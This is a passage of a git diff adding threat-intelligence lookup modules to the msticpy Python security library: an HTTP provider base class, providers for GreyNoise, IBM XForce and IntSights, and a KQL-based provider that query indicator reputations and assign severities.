+                "ConfidenceScore": x.ConfidenceScore,
+            },
+            axis=1,
+        )
+
+    @staticmethod
+    def _get_severity(data_result: pd.DataFrame) -> pd.Series:
+        # For the input frame return severity in a series
+        return data_result.apply(
+            lambda x: TISeverity.high.value
+            if x.Action.lower() in ["alert", "block"]
+            else TISeverity.warning.value,
+            axis=1,
+        )
diff --git a/msticpy/sectools/tiproviders/greynoise.py b/msticpy/sectools/tiproviders/greynoise.py
new file mode 100644
index 000000000..a364f8f83
--- /dev/null
+++ b/msticpy/sectools/tiproviders/greynoise.py
@@ -0,0 +1,101 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""
+GreyNoise Provider.
+
+Input can be a single IoC observable or a pandas DataFrame containing
+multiple observables. Processing may require a an API key and
+processing performance may be limited to a specific number of
+requests per minute for the account type that you have.
+
+"""
+from typing import Any, Tuple
+
+from ..._version import VERSION
+from .ti_provider_base import LookupResult, TISeverity
+from .http_base import HttpProvider, IoCLookupParams
+
+__version__ = VERSION
+__author__ = "Pete Bryan"
+
+
+class GreyNoise(HttpProvider):
+    """GreyNoise Lookup."""
+
+    _BASE_URL = "https://api.greynoise.io"
+
+    _IOC_QUERIES = {
+        # Community API
+        "ipv4": IoCLookupParams(
+            path="/v3/community/{observable}",
+            headers={"key": "{API_KEY}"},
+        ),
+        # Enterprise API Quick Lookup
+        "ipv4-quick": IoCLookupParams(
+            path="/v2/noise/quick/{observable}",
+            headers={"key": "{API_KEY}"},
+        ),
+        # Enterprise API Full Lookup
+        "ipv4-full": IoCLookupParams(
+            path="/v2/noise/context/{observable}",
+            headers={"key": "{API_KEY}"},
+        ),
+    }
+
+    def parse_results(self, response: LookupResult) -> Tuple[bool, TISeverity, Any]:
+        """
+        Return the details of the response.
+
+        Parameters
+        ----------
+        response : LookupResult
+            The returned data response
+
+        Returns
+        -------
+        Tuple[bool, TISeverity, Any]
+            bool = positive or negative hit
+            TISeverity = enumeration of severity
+            Object with match details
+
+        """
+        if self._failed_response(response) or not isinstance(response.raw_result, dict):
+            return False, TISeverity.information, "Not found."
+        result = True
+        result_dict = {}
+        # If community API response extract key elements
+        if "riot" in response.raw_result:
+            result_dict.update(
+                {
+                    "Classification": response.raw_result.get("classification"),
+                    "Name": response.raw_result.get("name"),
+                    "Last Seen": response.raw_result.get("last_seen"),
+                    "Message": response.raw_result.get("message"),
+                    "Noise": response.raw_result.get("noise"),
+                    "RIOT": response.raw_result.get("riot"),
+                }
+            )
+        # If enterprise full lookup response extract key elements
+        if "actor" in response.raw_result:
+            result_dict.update(
+                {
+                    "Classification": response.raw_result.get("classification"),
+                    "First Seen": response.raw_result.get("first_seen"),
+                    "Last Seen": response.raw_result.get("last_seen"),
+                    "Actor": response.raw_result.get("actor"),
+                    "Tags": response.raw_result.get("tags"),
+                    "VPN": response.raw_result.get("vpn_service", False),
+                    "Metadata": response.raw_result.get("metadata"),
+                }
+            )
+        # If enterprise quick lookup just return raw data is its so small
+        if "code" in response.raw_result:
+            result_dict = response.raw_result
+
+        severity = TISeverity.information
+        if response.raw_result["classification"] == "malicious":
+            severity = TISeverity.high
+        return result, severity, result_dict
diff --git a/msticpy/sectools/tiproviders/http_base.py b/msticpy/sectools/tiproviders/http_base.py
new file mode 100644
index 000000000..6601eb267
--- /dev/null
+++ b/msticpy/sectools/tiproviders/http_base.py
@@ -0,0 +1,295 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""
+HTTP TI Provider base.
+
+Input can be a single IoC observable or a pandas DataFrame containing
+multiple observables. Processing may require a an API key and
+processing performance may be limited to a specific number of
+requests per minute for the account type that you have.
+
+"""
+import abc
+import traceback
+from functools import lru_cache
+from http import client
+from json import JSONDecodeError
+from typing import Any, Dict, List, Tuple
+
+import attr
+import httpx
+from attr import Factory
+
+from ..._version import VERSION
+from ...common.exceptions import MsticpyConfigException
+from ...common.utility import export, _MSTICPY_USER_AGENT
+from .ti_provider_base import LookupResult, TILookupStatus, TIProvider, TISeverity
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+# pylint: disable=too-few-public-methods
+@attr.s(auto_attribs=True)
+class IoCLookupParams:
+    """IoC HTTP Lookup Params definition."""
+
+    path: str = ""
+    verb: str = "GET"
+    full_url: bool = False
+    headers: Dict[str, str] = Factory(dict)
+    params: Dict[str, str] = Factory(dict)
+    data: Dict[str, str] = Factory(dict)
+    auth_type: str = ""
+    auth_str: List[str] = Factory(list)
+    sub_type: str = ""
+
+
+@export
+class HttpProvider(TIProvider):
+    """HTTP TI provider base class."""
+
+    _BASE_URL = ""
+
+    _IOC_QUERIES: Dict[str, IoCLookupParams] = {}
+
+    _REQUIRED_PARAMS: List[str] = []
+
+    def __init__(self, **kwargs):
+        """Initialize a new instance of the class."""
+        super().__init__(**kwargs)
+
+        self._httpx_client = httpx.Client()
+        self._request_params = {}
+        if "ApiID" in kwargs:
+            self._request_params["API_ID"] = kwargs.pop("ApiID")
+        if "AuthKey" in kwargs:
+            self._request_params["API_KEY"] = kwargs.pop("AuthKey")
+
+        missing_params = [
+            param
+            for param in self._REQUIRED_PARAMS
+            if param not in self._request_params
+        ]
+        if missing_params:
+            param_list = ", ".join(f"'{param}'" for param in missing_params)
+            raise MsticpyConfigException(
+                f"Parameter values missing for TI Provider '{self.__class__.__name__}'",
+                f"Missing parameters are: {param_list}",
+            )
+
+    # pylint: disable=too-many-branches, duplicate-code
+    @lru_cache(maxsize=256)
+    def lookup_ioc(  # type: ignore
+        self, ioc: str, ioc_type: str = None, query_type: str = None, **kwargs
+    ) -> LookupResult:
+        """
+        Lookup a single IoC observable.
+
+        Parameters
+        ----------
+        ioc : str
+            IoC observable
+        ioc_type : str, optional
+            IocType, by default None (type will be inferred)
+        query_type : str, optional
+            Specify the data subtype to be queried, by default None.
+            If not specified the default record type for the IoC type
+            will be returned.
+
+        Returns
+        -------
+        LookupResult
+            The lookup result:
+            result - Positive/Negative,
+            details - Lookup Details (or status if failure),
+            raw_result - Raw Response
+            reference - URL of IoC
+
+        Raises
+        ------
+        NotImplementedError
+            If attempting to use an HTTP method or authentication
+            protocol that is not supported.
+
+        Notes
+        -----
+        Note: this method uses memoization (lru_cache) to cache results
+        for a particular observable to try avoid repeated network calls for
+        the same item.
+
+        """
+        result = self._check_ioc_type(
+            ioc=ioc, ioc_type=ioc_type, query_subtype=query_type
+        )
+
+        result.provider = kwargs.get("provider_name", self.__class__.__name__)
+        if result.status:
+            return result
+
+        req_params: Dict[str, Any] = {}
+        try:
+            verb, req_params = self._substitute_parms(
+                result.safe_ioc, result.ioc_type, query_type
+            )
+            if verb == "GET":
+                response = self._httpx_client.get(**req_params)
+            else:
+                raise NotImplementedError(f"Unsupported verb {verb}")
+            result.status = response.status_code
+            result.reference = req_params["url"]
+            if result.status == 200:
+                try:
+                    result.raw_result = response.json()
+                    result.result, severity, result.details = self.parse_results(result)
+                except JSONDecodeError:
+                    result.raw_result = f"""There was a problem parsing results from this lookup:
+                                        {response.text}"""
+                    result.result = False
+                    severity = TISeverity.information
+                    result.details = {}
+                result.set_severity(severity)
+                result.status = TILookupStatus.ok.value
+            else:
+                result.raw_result = str(response)
+                result.result = False
+                result.details = self._response_message(result.status)
+            return result
+        except (  # pylint: disable=duplicate-code
+            LookupError,
+            JSONDecodeError,
+            NotImplementedError,
+            ConnectionError,
+        ) as err:
+            self._err_to_results(result, err)
+            if not isinstance(err, LookupError):
+                url = req_params.get("url", None) if req_params else None
+                result.reference = url
+            return result
+
+    # pylint: enable=duplicate-code
+    # pylint: disable=too-many-branches
+    def _substitute_parms(
+        self, ioc: str, ioc_type: str, query_type: str = None
+    ) -> Tuple[str, Dict[str, Any]]:
+        """
+        Create requests parameters collection.
+
+        Parameters
+        ----------
+        ioc : str
+            IoC observable
+        ioc_type : str, optional
+            IocType, by default None
+        query_type : str, optional
+            Specify the data subtype to be queried, by default None.
+            If not specified the default record type for the IoC type
+            will be returned.
+
+        Returns
+        -------
+        Tuple[str, Dict[str, Any]]
+            HTTP method, dictionary of parameter keys/values
+
+        """
+        req_params = {"observable": ioc}
+        req_params.update(self._request_params)
+        ioc_key = ioc_type + "-" + query_type if query_type else ioc_type
+        src = self._IOC_QUERIES.get(ioc_key, None)
+        if not src:
+            raise LookupError(f"Provider does not support IoC type {ioc_key}.")
+
+        # create a parameter dictionary to pass to requests
+        # substitute any parameter value from our req_params dict
+        req_dict: Dict[str, Any] = {
+            "headers": {},
+            "url": self._BASE_URL + src.path.format(**req_params)
+            if not src.full_url
+            else src.path.format(observable=ioc),
+        }
+
+        if src.headers:
+            headers: Dict[str, Any] = {
+                key: val.format(**req_params) for key, val in src.headers.items()
+            }
+            req_dict["headers"] = headers
+        if "User-Agent" not in req_dict["headers"]:
+            req_dict["headers"]["User-Agent"] = _MSTICPY_USER_AGENT
+        if src.params:
+            q_params: Dict[str, Any] = {
+                key: val.format(**req_params) for key, val in src.params.items()
+            }
+            req_dict["params"] = q_params
+        if src.data:
+            q_data: Dict[str, Any] = {
+                key: val.format(**req_params) for key, val in src.data.items()
+            }
+            req_dict["data"] = q_data
+        if src.auth_type and src.auth_str:
+            auth_strs: Tuple = tuple(p.format(**req_params) for p in src.auth_str)
+            if src.auth_type == "HTTPBasic":
+                req_dict["auth"] = auth_strs
+            else:
+                raise NotImplementedError(f"Unknown auth type {src.auth_type}")
+        return src.verb, req_dict
+
+    @abc.abstractmethod
+    def parse_results(self, response: LookupResult) -> Tuple[bool, TISeverity, Any]:
+        """
+        Return the details of the response.
+
+        Parameters
+        ----------
+        response : LookupResult
+            The returned data response
+
+        Returns
+        -------
+        Tuple[bool, TISeverity, Any]
+            bool = positive or negative hit
+            TISeverity = enumeration of severity
+            Object with match details
+
+        """
+
+    @staticmethod
+    def _failed_response(response: LookupResult) -> bool:
+        """
+        Return True if negative response.
+
+        Parameters
+        ----------
+        response : LookupResult
+            The returned data response
+
+        Returns
+        -------
+        bool
+            True if the response indicated failure.
+
+        """
+        return (
+            response.status != 200
+            or not response.raw_result
+            or not isinstance(response.raw_result, dict)
+        )
+
+    @staticmethod
+    def _err_to_results(result: LookupResult, err: Exception):
+        result.details = err.args
+        result.raw_result = (
+            type(err).__name__ + "\n" + str(err) + "\n" + traceback.format_exc()
+        )
+
+    @staticmethod
+    def _response_message(status_code):
+        if status_code == 404:
+            return "Not found."
+        if status_code == 401:
+            return "Authorization failed. Check account and key details."
+        if status_code == 403:
+            return "Request forbidden. Allowed query rate may have been exceeded."
+        return client.responses.get(status_code, "Unknown HTTP status code.")
diff --git a/msticpy/sectools/tiproviders/ibm_xforce.py b/msticpy/sectools/tiproviders/ibm_xforce.py
new file mode 100644
index 000000000..feaba6e72
--- /dev/null
+++ b/msticpy/sectools/tiproviders/ibm_xforce.py
@@ -0,0 +1,150 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""
+IBM XForce Provider.
+
+Input can be a single IoC observable or a pandas DataFrame containing
+multiple observables. Processing may require a an API key and
+processing performance may be limited to a specific number of
+requests per minute for the account type that you have.
+
+"""
+from typing import Any, Tuple
+
+import attr
+
+from .ti_provider_base import LookupResult, TISeverity
+from .http_base import HttpProvider, IoCLookupParams
+from ...common.utility import export
+from ..._version import VERSION
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+# pylint: disable=too-few-public-methods
+@attr.s
+class _XForceParams(IoCLookupParams):
+    # override IoCLookupParams to set common defaults
+    def __attrs_post_init__(self):
+        self.auth_str = ["{API_ID}", "{API_KEY}"]
+        self.auth_type = "HTTPBasic"
+
+
+@export
+class XForce(HttpProvider):
+    """IBM XForce Lookup."""
+
+    _BASE_URL = "https://api.xforce.ibmcloud.com"
+
+    _IOC_QUERIES = {
+        "ipv4": _XForceParams(path="/ipr/{observable}"),
+        "ipv4-rep": _XForceParams(path="/ipr/history/{observable}"),
+        "ipv4-malware": _XForceParams(path="/ipr/malware/{observable}"),
+        "ipv4-whois": _XForceParams(path="/whois/{observable}"),
+        "dns-passivedns": _XForceParams(path="/resolve/{observable}"),
+        "hostname-whois": _XForceParams(path="/whois/{observable}"),
+        "file_hash": _XForceParams(path="/malware/{observable}"),
+        "url": _XForceParams(path="/url/{observable}"),
+        "url-malware": _XForceParams(path="/url/malware/{observable}"),
+    }
+
+    # pylint: disable=duplicate-code
+    # aliases
+    _IOC_QUERIES["ipv6"] = _IOC_QUERIES["ipv4"]
+    _IOC_QUERIES["ipv6-rep"] = _IOC_QUERIES["ipv4-rep"]
+    _IOC_QUERIES["ipv6-malware"] = _IOC_QUERIES["ipv4-malware"]
+    _IOC_QUERIES["ipv6-whois"] = _IOC_QUERIES["ipv4-whois"]
+    _IOC_QUERIES["md5_hash"] = _IOC_QUERIES["file_hash"]
+    _IOC_QUERIES["sha1_hash"] = _IOC_QUERIES["file_hash"]
+    _IOC_QUERIES["sha256_hash"] = _IOC_QUERIES["file_hash"]
+    _IOC_QUERIES["dns"] = _IOC_QUERIES["url"]
+    _IOC_QUERIES["dns-malware"] = _IOC_QUERIES["url-malware"]
+    _IOC_QUERIES["ipv4-passivedns"] = _IOC_QUERIES["dns-passivedns"]
+    _IOC_QUERIES["ipv6-passivedns"] = _IOC_QUERIES["dns-passivedns"]
+    _IOC_QUERIES["hostname-whois"] = _IOC_QUERIES["ipv4-whois"]
+    _IOC_QUERIES["dns-whois"] = _IOC_QUERIES["ipv4-whois"]
+
+    _REQUIRED_PARAMS = ["API_ID", "API_KEY"]
+
+    # pylint: disable=too-many-branches
+    def parse_results(self, response: LookupResult) -> Tuple[bool, TISeverity, Any]:
+        """
+        Return the details of the response.
+
+        Parameters
+        ----------
+        response : LookupResult
+            The returned data response
+
+        Returns
+        -------
+        Tuple[bool, TISeverity, Any]
+            bool = positive or negative hit
+            TISeverity = enumeration of severity
+            Object with match details
+
+        """
+        severity = TISeverity.information
+        if self._failed_response(response) or not isinstance(response.raw_result, dict):
+            return False, severity, "Not found."
+        result = True
+        result_dict = {}
+        if (
+            response.ioc_type in ["ipv4", "ipv6", "url", "dns"]
+            and not response.query_subtype
+        ):
+            score = response.raw_result.get("score", 0)
+            result_dict.update(
+                {
+                    "score": response.raw_result.get("score", 0),
+                    "cats": response.raw_result.get("cats"),
+                    "categoryDescriptions": response.raw_result.get(
+                        "categoryDescriptions"
+                    ),
+                    "reason": response.raw_result.get("reason"),
+                    "reasonDescription": response.raw_result.get(
+                        "reasonDescription", 0
+                    ),
+                    "tags": response.raw_result.get("tags", 0),
+                }
+            )
+            severity = (
+                TISeverity.information
+                if score < 2
+                else TISeverity.warning
+                if 2 <= score < 5
+                else TISeverity.high
+            )
+        if (
+            response.ioc_type in ["file_hash", "md5_hash", "sha1_hash", "sha256_hash"]
+            or response.query_subtype == "malware"
+        ):
+            malware = response.raw_result.get("malware")
+            if malware:
+                result_dict.update(
+                    {
+                        "risk": malware.get("risk"),
+                        "family": malware.get("family"),
+                        "reasonDescription": response.raw_result.get(
+                            "reasonDescription", 0
+                        ),
+                    }
+                )
+                severity = TISeverity.high
+        if response.ioc_type in [
+            "dns",
+            "ipv4",
+            "ipv6",
+            "hostname",
+        ] and response.query_subtype in ["info", "passivedns", "whois"]:
+            records = response.raw_result.get("total_rows", 0)
+            contact = response.raw_result.get("contact", 0)
+            if records:
+                result_dict.update({"records": records})
+            elif contact:
+                result_dict.update({"contact": contact})
+        return result, severity, result_dict
diff --git a/msticpy/sectools/tiproviders/intsights.py b/msticpy/sectools/tiproviders/intsights.py
new file mode 100644
index 000000000..1db5f30bc
--- /dev/null
+++ b/msticpy/sectools/tiproviders/intsights.py
@@ -0,0 +1,144 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""
+Intsights Provider.
+
+Input can be a single IoC observable or a pandas DataFrame containing
+multiple observables. Processing may require a an API key and
+processing performance may be limited to a specific number of
+requests per minute for the account type that you have.
+"""
+import datetime as dt
+from typing import Any, Tuple
+
+import attr
+from .ti_provider_base import LookupResult, TISeverity
+from .http_base import HttpProvider, IoCLookupParams
+from ...common.utility import export
+from ..._version import VERSION
+
+__version__ = VERSION
+__author__ = "Florian Bracq"
+
+
+_DEF_HEADERS = {"Content-Type": "application/json", "Accept": "application/json"}
+
+
+# pylint: disable=too-few-public-methods
+@attr.s
+class _IntSightsParams(IoCLookupParams):
+    # override IoCLookupParams to set common defaults
+    def __attrs_post_init__(self):
+        self.auth_str = ["{API_ID}", "{API_KEY}"]
+        self.auth_type = "HTTPBasic"
+
+
+@export
+class IntSights(HttpProvider):
+    """IntSights Lookup."""
+
+    _BASE_URL = "https://api.intsights.com"
+
+    _IOC_QUERIES = {
+        "ipv4": _IntSightsParams(
+            path="/public/v2/iocs/ioc-by-value",
+            params={"iocValue": "{observable}"},
+            headers=_DEF_HEADERS,
+        ),
+        "ipv6": _IntSightsParams(
+            path="/public/v2/iocs/ioc-by-value",
+            params={"iocValue": "{observable}"},
+            headers=_DEF_HEADERS,
+        ),
+        "dns": _IntSightsParams(
+            path="/public/v2/iocs/ioc-by-value",
+            params={"iocValue": "{observable}"},
+            headers=_DEF_HEADERS,
+        ),
+        "url": _IntSightsParams(
+            path="/public/v2/iocs/ioc-by-value",
+            params={"iocValue": "{observable}"},
+            headers=_DEF_HEADERS,
+        ),
+        "md5_hash": _IntSightsParams(
+            path="/public/v2/iocs/ioc-by-value",
+            params={"iocValue": "{observable}"},
+            headers=_DEF_HEADERS,
+        ),
+        "sha1_hash": _IntSightsParams(
+            path="/public/v2/iocs/ioc-by-value",
+            params={"iocValue": "{observable}"},
+            headers=_DEF_HEADERS,
+        ),
+        "sha256_hash": _IntSightsParams(
+            path="/public/v2/iocs/ioc-by-value",
+            params={"iocValue": "{observable}"},
+            headers=_DEF_HEADERS,
+        ),
+        "email": _IntSightsParams(
+            path="/public/v2/iocs/ioc-by-value",
+            params={"iocValue": "{observable}"},
+            headers=_DEF_HEADERS,
+        ),
+    }
+
+    _REQUIRED_PARAMS = ["API_ID", "API_KEY"]
+
+    def parse_results(self, response: LookupResult) -> Tuple[bool, TISeverity, Any]:
+        """
+        Return the details of the response.
+
+        Parameters
+        ----------
+        response : LookupResult
+            The returned data response
+
+        Returns
+        -------
+        Tuple[bool, TISeverity, Any]
+            bool = positive or negative hit
+            TISeverity = enumeration of severity
+            Object with match details
+
+        """
+        if self._failed_response(response) or not isinstance(response.raw_result, dict):
+            return False, TISeverity.information, "Not found."
+
+        if response.raw_result["Whitelist"] == "True":
+            return False, TISeverity.information, "Whitelisted."
+
+        sev = response.raw_result["Severity"]
+        result_dict = {
+            "threat_actors": response.raw_result["RelatedThreatActors"],
+            "geolocation": response.raw_result.get("Geolocation", ""),
+            "response_code": response.status,
+            "tags": response.raw_result["Tags"] + response.raw_result["SystemTags"],
+            "malware": response.raw_result["RelatedMalware"],
+            "campaigns": response.raw_result["RelatedCampaigns"],
+            "sources": response.raw_result["Sources"],
+            "score": response.raw_result["Score"],
+            "first_seen": dt.datetime.strptime(
+                response.raw_result["FirstSeen"], "%Y-%m-%dT%H:%M:%S.%fZ"
+            ),
+            "last_seen": dt.datetime.strptime(
+                response.raw_result["LastSeen"], "%Y-%m-%dT%H:%M:%S.%fZ"
+            ),
+            "last_update": dt.datetime.strptime(
+                response.raw_result["LastUpdate"], "%Y-%m-%dT%H:%M:%S.%fZ"
+            ),
+        }
+
+        severity = (
+            TISeverity.information
+            if sev == "Low"
+            else TISeverity.warning
+            if sev == "Medium"
+            else TISeverity.high
+            if sev == "High"
+            else TISeverity.unknown
+        )
+
+        return True, severity, result_dict
diff --git a/msticpy/sectools/tiproviders/kql_base.py b/msticpy/sectools/tiproviders/kql_base.py
new file mode 100644
index 000000000..8aa56f043
--- /dev/null
+++ b/msticpy/sectools/tiproviders/kql_base.py
@@ -0,0 +1,405 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""
+Kql TI Provider base.
+
+Input can be a single IoC observable or a pandas DataFrame containing
+multiple observables. Processing may require a an API key and
+processing performance may be limited to a specific number of
+requests per minute for the account type that you have.
+
+"""
+import abc
+from collections import defaultdict
+from functools import lru_cache
+from typing import Any, Dict, Tuple, Union, Iterable, DefaultDict, Set, List, Callable
+import warnings
+
+import pandas as pd
+
+from ..._version import VERSION
+from ...common.exceptions import MsticpyConfigException
+from ...common.utility import export
+from ...common.wsconfig import WorkspaceConfig
+from ...data import QueryProvider
+from .ti_provider_base import (
+    LookupResult,
+    TIProvider,
+    generate_items,
+    TISeverity,
+    TILookupStatus,
+)
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+@export
+class KqlTIProvider(TIProvider):
+    """KQL TI provider base class."""
+
+    _IOC_QUERIES: Dict[str, tuple] = {}
+
+    _CONNECT_STR = (
+        "loganalytics://code().tenant('{TENANT_ID}').workspace('{WORKSPACE_ID}')"
+    )
+
+    def __init__(self, **kwargs):
+        """Initialize a new instance of the class."""
+        super().__init__(**kwargs)
+
+        if "query_provider" in kwargs and isinstance(
+            kwargs["query_provider"], QueryProvider
+        ):
+            self._query_provider = kwargs.pop("query_provider")
+        else:
+            self._query_provider = self._create_query_provider(**kwargs)
+
+        if not self._query_provider or not self._query_provider.connected:
+            raise MsticpyConfigException("Query provider for KQL could not be created.")
+
+    # pylint: disable=duplicate-code
+    @lru_cache(maxsize=256)
+    def lookup_ioc(  # type: ignore
+        self, ioc: str, ioc_type: str = None, query_type: str = None, **kwargs
+    ) -> LookupResult:
+        """
+        Lookup a single IoC observable.
+
+        Parameters
+        ----------
+        ioc : str
+            IoC observable
+        ioc_type : str, optional
+            IocType, by default None (type will be inferred)
+        query_type : str, optional
+            Specify the data subtype to be queried, by default None.
+            If not specified the default record type for the IoC type
+            will be returned.
+
+        Returns
+        -------
+        LookupResult
+            The lookup result:
+            result - Positive/Negative,
+            details - Lookup Details (or status if failure),
+            raw_result - Raw Response
+            reference - URL of IoC
+
+        Raises
+        ------
+        LookupError
+            If a query could not be found for the ioc_type.
+
+        Notes
+        -----
+        Note: this method uses memoization (lru_cache) to cache results
+        for a particular observable to try avoid repeated network calls for
+        the same item.
+
+        """
+        # check and lookup (if needed) ioc_type
+        result = self._check_ioc_type(
+            ioc=ioc, ioc_type=ioc_type, query_subtype=query_type
+        )
+        result.provider = kwargs.get("provider_name", self.__class__.__name__)
+        if result.status:
+            return result
+
+        try:
+            query_obj, query_params = self._get_query_and_params(
+                ioc=ioc, ioc_type=result.ioc_type, query_type=query_type, **kwargs
+            )
+        except LookupError as err:
+            result.details = err.args
+            result.raw_result = type(err).__name__ + "\n" + str(err) + "\n"
+            return result
+
+        if not query_obj:
+            raise LookupError(
+                f"Could not find query for {ioc} ({ioc_type}, {query_type})"
+            )
+        data_result = query_obj(**query_params)
+        if not isinstance(data_result, pd.DataFrame):
+            result.status = TILookupStatus.query_failed.value
+        if data_result.empty:
+            result.details = "Not found."
+            result.status = TILookupStatus.ok.value
+            return result
+
+        result.raw_result = data_result
+        result.result, severity, result.details = self.parse_results(result)
+        result.set_severity(severity)
+        # Save the query that was used.
+        result.reference = query_obj("print_query", **query_params)
+        return result
+
+    # pylint: disable=too-many-locals, too-many-branches
+    def lookup_iocs(  # noqa: C901, MC0001
+        self,
+        data: Union[pd.DataFrame, Dict[str, str], Iterable[str]],
+        obs_col: str = None,
+        ioc_type_col: str = None,
+        query_type: str = None,
+        **kwargs,
+    ) -> pd.DataFrame:
+        """
+        Lookup collection of IoC observables.
+
+        Parameters
+        ----------
+        data : Union[pd.DataFrame, Dict[str, str], Iterable[str]]
+            Data input in one of three formats:
+            1. Pandas dataframe (you must supply the column name in
+            `obs_col` parameter)
+            2. Dict of observable, IoCType
+            3. Iterable of observables - IoCTypes will be inferred
+        obs_col : str, optional
+            DataFrame column to use for observables, by default None
+        ioc_type_col : str, optional
+            DataFrame column to use for IoCTypes, by default None
+        query_type : str, optional
+            Specify the data subtype to be queried, by default None.
+            If not specified the default record type for the IoC type
+            will be returned.
+
+        Returns
+        -------
+        pd.DataFrame
+            DataFrame of results.
+
+        """
+        # We need to partition the IoC types to invoke separate queries
+        ioc_groups: DefaultDict[str, Set[str]] = defaultdict(set)
+        for ioc, ioc_type in generate_items(data, obs_col, ioc_type_col):
+            if not ioc:
+                continue
+            result = self._check_ioc_type(
+                ioc=ioc, ioc_type=ioc_type, query_subtype=query_type
+            )
+
+            if result.status != TILookupStatus.not_supported.value:
+                ioc_groups[result.ioc_type].add(result.ioc)
+
+        all_results = []
+        for ioc_type, obs_set in ioc_groups.items():
+            try:
+                query_obj, query_params = self._get_query_and_params(
+                    ioc=list(obs_set),
+                    ioc_type=ioc_type,
+                    query_type=query_type,
+                    **kwargs,
+                )
+            except LookupError:
+                pass
+            if not query_obj:
+                warnings.warn(f"Could not find query for {ioc_type}, {query_type}")
+                continue
+
+            # run the query
+            data_result = query_obj(**query_params)
+            if isinstance(data_result, pd.DataFrame):
+                data_result = data_result.copy()
+            else:
+                if (
+                    hasattr(data_result, "completion_query_info")
+                    and data_result.completion_query_info["StatusCode"] == 0
+                    and data_result.records_count == 0
+                ):
+                    print("No results return from data provider.")
+                elif data_result and hasattr(data_result, "completion_query_info"):
+                    print(
+                        "No results returned from data provider. "
+                        + str(data_result.completion_query_info)
+                    )
+                else:
+                    print("Unknown response from provider: " + str(data_result))
+
+            src_ioc_frame = pd.DataFrame(obs_set, columns=["Ioc"])
+            src_ioc_frame["IocType"] = ioc_type
+            src_ioc_frame["QuerySubtype"] = query_type
+            src_ioc_frame["Reference"] = query_obj("print_query", **query_params)
+
+            # If no results, add the empty dataframe to the combined results
+            # and continue
+            if not isinstance(data_result, pd.DataFrame):
+                src_ioc_frame["Result"] = False
+                src_ioc_frame["Details"] = "Query failure"
+                src_ioc_frame["Status"] = TILookupStatus.query_failed.value
+                src_ioc_frame["Severity"] = TISeverity.information.value
+                all_results.append(src_ioc_frame)
+                continue
+            if data_result.empty:
+                src_ioc_frame["Result"] = False
+                src_ioc_frame["Details"] = "Not found."
+                src_ioc_frame["Status"] = TILookupStatus.ok.value
+                src_ioc_frame["Severity"] = TISeverity.information.value
+                all_results.append(src_ioc_frame)
+                continue
+
+            # Create our results columns
+            data_result["Result"] = True
+            data_result["Status"] = TILookupStatus.ok.value
+            data_result["Severity"] = self._get_severity(data_result)
+            data_result["Details"] = self._get_detail_summary(data_result)
+            data_result["RawResult"] = data_result.apply(lambda x: x.to_dict(), axis=1)
+
+            combined_results_df = self._combine_results(
+                input_df=src_ioc_frame, results_df=data_result, reslt_ioc_key="IoC"
+            )
+            all_results.append(combined_results_df)
+
+        return pd.concat(all_results, ignore_index=True, sort=False, axis=0)
+
+    @abc.abstractmethod
+    def parse_results(self, response: LookupResult) -> Tuple[bool, TISeverity, Any]:
+        """
+        Return the details of the response.
+
+        Parameters
+        ----------
+        response : LookupResult
+            The returned data response
+
+        Returns
+        -------
+        Tuple[bool, TISeverity, Any]
+            bool = positive or negative hit
+            TISeverity = enumeration of severity
+            Object with match details
+
+        """
+
+    @staticmethod
+    @abc.abstractmethod
+    def _get_detail_summary(data_result: pd.DataFrame) -> pd.Series:
+        pass
+
+    @staticmethod
+    @abc.abstractmethod
+    def _get_severity(data_result: pd.DataFrame) -> pd.Series:
+        pass
+
+    def _create_query_provider(self, **kwargs):
+        workspace_id = None
+        tenant_id = None
+        workspace_id = self._get_spelled_variants("workspaceid", **kwargs)
+        tenant_id = self._get_spelled_variants("tenantid", **kwargs)
+
+        if not workspace_id or not tenant_id:
+            # If there are no TI-Provider specific kwargs
+            # WorkspaceConfig should be able to get these global values
+            # If a config file or a workspace name is passed we'll use
+            # those in case there are multiple workspaces set globally.
+            config_file = kwargs.get("config_file")
+            workspace = kwargs.get("workspace")
+            ws_config = WorkspaceConfig(config_file=config_file, workspace=workspace)
+            workspace_id = ws_config["workspace_id"]
+            tenant_id = ws_config["tenant_id"]
+        # Either the format or connect() call will fail if these values are
+        # not set or invalid.
+        connect_str = self._CONNECT_STR.format(
+            TENANT_ID=tenant_id, WORKSPACE_ID=workspace_id
+        )
+        query_provider = QueryProvider("LogAnalytics")
+        query_provider.connect(connect_str)
+        return query_provider
+
+    @staticmethod
+    def _get_spelled_variants(name: str, **kwargs) -> Any:
+        """Return value with matching variant spelling key."""
+        variant_dict = {
+            "workspaceid": ["workspace_id", "workspaceid"],
+            "tenantid": ["tenant_id", "tenantid"],
+        }
+        variants = variant_dict.get(name, [name.casefold()])
+        for key, val in kwargs.items():
+            if key.casefold() in variants:
+                return val
+        return None
+
+    # pylint: disable=too-many-branches
+    def _get_query_and_params(
+        self,
+        ioc: Union[str, List[str]],
+        ioc_type: str,
+        query_type: str = None,
+        **kwargs,
+    ) -> Tuple[Callable, Dict[str, Any]]:
+
+        if query_type:
+            ioc_key = ioc_type + "-" + query_type
+        else:
+            ioc_key = ioc_type
+
+        query_def = self._IOC_QUERIES.get(ioc_key, None)
+        if not query_def:
+            raise LookupError(f"Provider does not support IoC type {ioc_key}.")
+
+        query_name = query_def[0]
+        query_def_params = query_def[1]
+        query_params = {}
+        if "ioc" not in query_def_params:
+            raise ValueError(
+                f"No parameter name defined for observable for {ioc_type}. "
+                + f"Referenced query: {query_name}"
+            )
+
